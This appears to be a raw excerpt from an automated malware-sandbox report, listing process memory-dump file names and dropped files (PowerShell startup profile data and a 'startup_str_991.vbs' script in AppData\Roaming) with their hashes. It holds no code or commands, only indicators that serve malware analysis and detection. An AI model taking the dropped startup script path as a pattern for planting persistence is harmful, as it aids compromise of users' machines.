memory/2292-162-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-165-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-181-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/4396-198-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/2292-201-0x00000205B5E00000-0x00000205B5E10000-memory.dmp

memory/2292-206-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4a19d2f0bbbfd0b860dd34dc7422b58b
SHA1 4334057c7d2792735d2461ffbcfa3c796f79e1c3
SHA256 7edd03ffa0d38ffbc336e31b6b1f4bbdbad99605e79f473e37362867623ae259
SHA512 018ee82f304d0f49e463cfd13bac9a2968ea543c82e7981334acf5506d2f8040eb689da8cd45b6c1ca08fa14ec47a43762525352aac33d4863bccd33fad3827e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6c59ae289c6cd378ba3c32219b44ae24
SHA1 eb064e026f4ea176716ed4ec2ede9e66f196d2aa
SHA256 fdc6f52488f057437990155aba3dd308b7ed4faee73fe7cf9d21e53b8a952cd6
SHA512 e80b7deeef7a5fe16b6aef7a894c45da1ccc79d8a5360b36a664a2a36867be3f0350a06458629f8d0e7671b4b0e0d2050efbc0cde61e068cb60a6719fb67dadc

C:\Users\Admin\AppData\Roaming\startup_str_991.vbs

MD5 31ad013b3aa57b3fbb6cb1e560d05fe7
SHA1 fd7e96db28efd6baed7cd97e90dadb8f58b0c162
SHA256 fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb
SHA512 f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28

memory/4396-223-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4396-225-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/4420-227-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-228-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/3008-230-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-232-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4396-233-0x0000017EAFDB0000-0x0000017EAFDC0000-memory.dmp

memory/3008-244-0x000001856BDA0000-0x000001856BDB0000-memory.dmp

memory/4420-247-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4420-250-0x000001E8455F0000-0x000001E8455FE000-memory.dmp

memory/3008-254-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4396-255-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-256-0x00007FFF29BE0000-0x00007FFF2A5CC000-memory.dmp

memory/4420-257-0x000001E82CE60000-0x000001E82CE70000-memory.dmp

memory/4420-258-0x000001E82CE60000-0x000001E82CE70000-memory.dmp